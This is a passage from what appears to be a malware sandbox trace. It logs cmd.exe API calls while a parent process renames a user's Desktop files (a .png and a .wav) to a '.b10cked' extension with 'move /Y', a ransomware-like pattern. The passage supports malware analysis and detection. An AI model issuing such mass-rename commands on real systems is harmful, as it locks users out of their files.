hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.178] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.178] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.189] GetEnvironmentStringsW () returned 0x410178* [0220.189] FreeEnvironmentStringsW (penv=0x410178) returned 1 [0220.189] GetEnvironmentStringsW () returned 0x410178* [0220.189] FreeEnvironmentStringsW (penv=0x410178) returned 1 [0220.189] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e75c | out: phkResult=0x20e75c*=0x40) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x0, lpData=0x20e768*=0xa0, lpcbData=0x20e760*=0x1000) returned 0x2 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x1, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x0, lpData=0x20e768*=0x1, lpcbData=0x20e760*=0x1000) returned 0x2 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x0, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x40, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x40, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x0, lpData=0x20e768*=0x40, lpcbData=0x20e760*=0x1000) returned 0x2 [0220.190] RegCloseKey (hKey=0x40) returned 0x0 [0220.190] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e75c | out: phkResult=0x20e75c*=0x40) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x0, lpData=0x20e768*=0x40, lpcbData=0x20e760*=0x1000) returned 0x2 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x1, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x0, lpData=0x20e768*=0x1, lpcbData=0x20e760*=0x1000) returned 0x2 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x0, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x9, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x9, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x0, lpData=0x20e768*=0x9, lpcbData=0x20e760*=0x1000) returned 0x2 [0220.190] RegCloseKey (hKey=0x40) returned 0x0 [0220.190] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.190] srand (_Seed=0x5b8863b6) [0220.190] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked\"" [0220.190] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked\"" [0220.191] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.191] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4118d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.191] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.191] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.191] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.191] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.191] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.191] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.191] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.191] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.191] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.191] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.191] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.191] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.192] GetEnvironmentStringsW () returned 0x4122c8* [0220.192] FreeEnvironmentStringsW (penv=0x4122c8) returned 1 [0220.192] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.192] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.192] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.192] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.192] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.192] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.192] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.192] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.192] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.192] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.192] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f528 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.192] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f528, lpFilePart=0x20f524 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f524*="Desktop") returned 0x18 [0220.192] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.192] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f2a4 | out: lpFindFileData=0x20f2a4) returned 0x410008 [0220.193] FindClose (in: hFindFile=0x410008 | out: hFindFile=0x410008) returned 1 [0220.193] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f2a4 | out: lpFindFileData=0x20f2a4) returned 0x410008 [0220.193] FindClose (in: hFindFile=0x410008 | out: hFindFile=0x410008) returned 1 [0220.193] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f2a4 | out: lpFindFileData=0x20f2a4) returned 0x410008 [0220.193] FindClose (in: hFindFile=0x410008 | out: hFindFile=0x410008) returned 1 [0220.193] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.193] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.193] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.193] GetEnvironmentStringsW () returned 0x412ae8* [0220.194] FreeEnvironmentStringsW (penv=0x412ae8) returned 1 [0220.194] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.194] GetConsoleOutputCP () returned 0x1b5 [0220.197] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.197] GetUserDefaultLCID () returned 0x409 [0220.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f668, cchData=128 | out: lpLCData="0") returned 2 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f668, cchData=128 | out: lpLCData="0") returned 2 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f668, cchData=128 | out: lpLCData="1") returned 2 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.200] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.201] GetConsoleTitleW (in: lpConsoleTitle=0x4008d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.212] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.212] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.212] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.212] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.213] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.213] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.213] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.213] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.213] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.213] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.213] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.216] GetConsoleTitleW (in: lpConsoleTitle=0x20f360, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.216] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.216] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.216] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.216] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.216] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.216] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.216] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.216] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.216] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.216] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.216] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.216] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.216] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.216] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.216] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.216] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.216] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.216] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.216] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.216] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.216] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.216] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.217] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.217] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.217] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.217] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.217] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.217] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.217] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.217] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.217] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.217] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.217] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.217] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.217] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.218] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.218] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.218] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f11c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f114, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f114*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.219] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.220] _wcsicmp (_String1="BCUGG-~1.PNG", _String2=".") returned 52 [0220.220] _wcsicmp (_String1="BCUGG-~1.PNG", _String2="..") returned 52 [0220.220] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\bcugg-~1.png")) returned 0x20 [0220.375] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x411d50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.375] SetErrorMode (uMode=0x0) returned 0x0 [0220.375] SetErrorMode (uMode=0x1) returned 0x0 [0220.375] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG", nBufferLength=0x104, lpBuffer=0x20eaa4, lpFilePart=0x20ea8c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG", lpFilePart=0x20ea8c*="BCUGG-~1.PNG") returned 0x25 [0220.375] SetErrorMode (uMode=0x0) returned 0x1 [0220.375] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.375] _wcsicmp (_String1="BCUGG-~1.PNG", _String2=".") returned 52 [0220.375] _wcsicmp (_String1="BCUGG-~1.PNG", _String2="..") returned 52 [0220.375] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\bcugg-~1.png")) returned 0x20 [0220.376] SetErrorMode (uMode=0x0) returned 0x0 [0220.376] SetErrorMode (uMode=0x1) returned 0x0 [0220.376] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG", nBufferLength=0x104, lpBuffer=0x20ef20, lpFilePart=0x20ecb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG", lpFilePart=0x20ecb8*="BCUGG-~1.PNG") returned 0x25 [0220.376] SetErrorMode (uMode=0x0) returned 0x1 [0220.376] SetErrorMode (uMode=0x0) returned 0x0 [0220.376] SetErrorMode (uMode=0x1) returned 0x0 [0220.376] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked", nBufferLength=0x104, lpBuffer=0x20f128, lpFilePart=0x20ecb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked", lpFilePart=0x20ecb8*="BcUgG-6ytRMwdapH.png.b10cked") returned 0x35 [0220.376] SetErrorMode (uMode=0x0) returned 0x1 [0220.376] SetLastError (dwErrCode=0x0) [0220.376] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\bcugg-6ytrmwdaph.png.b10cked")) returned 0xffffffff [0220.376] GetLastError () returned 0x2 [0220.376] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x20e634, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e634) returned 0x400f20 [0220.376] FindNextFileW (in: hFindFile=0x400f20, lpFindFileData=0x20e634 | out: lpFindFileData=0x20e634) returned 0 [0220.377] GetLastError () returned 0x12 [0220.377] FindClose (in: hFindFile=0x400f20 | out: hFindFile=0x400f20) returned 1 [0220.378] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x411af0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x411af0) returned 0x400f20 [0220.378] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked", nBufferLength=0x104, lpBuffer=0x20e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked", lpFilePart=0x0) returned 0x35 [0220.378] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png", nBufferLength=0x104, lpBuffer=0x20e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png", lpFilePart=0x0) returned 0x2d [0220.378] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png" (normalized: "c:\\users\\eebsym5\\desktop\\bcugg-6ytrmwdaph.png")) returned 0x20 [0220.378] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png" (normalized: "c:\\users\\eebsym5\\desktop\\bcugg-6ytrmwdaph.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\bcugg-6ytrmwdaph.png.b10cked"), dwFlags=0x3) returned 1 [0220.379] FindClose (in: hFindFile=0x400f20 | out: hFindFile=0x400f20) returned 1 [0220.379] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20e880 | out: _Buffer=" 1") returned 9 [0220.380] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.380] GetFileType (hFile=0x7) returned 0x2 [0220.380] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.380] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20e80c | out: lpMode=0x20e80c) returned 1 [0220.380] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.380] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20e840 | out: lpConsoleScreenBufferInfo=0x20e840) returned 1 [0220.380] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0220.381] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x20e880 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0220.381] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20e864, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x20e864*=0x1a) returned 1 [0220.381] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.381] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.381] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.381] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.381] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.381] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.382] SetConsoleInputExeNameW () returned 0x1 [0220.382] GetConsoleOutputCP () returned 0x1b5 [0220.382] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.382] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.382] exit (_Code=0) Process: id = "575" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0xe58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32914 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32915 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32916 start_va = 0x40000 end_va = 0x40fff 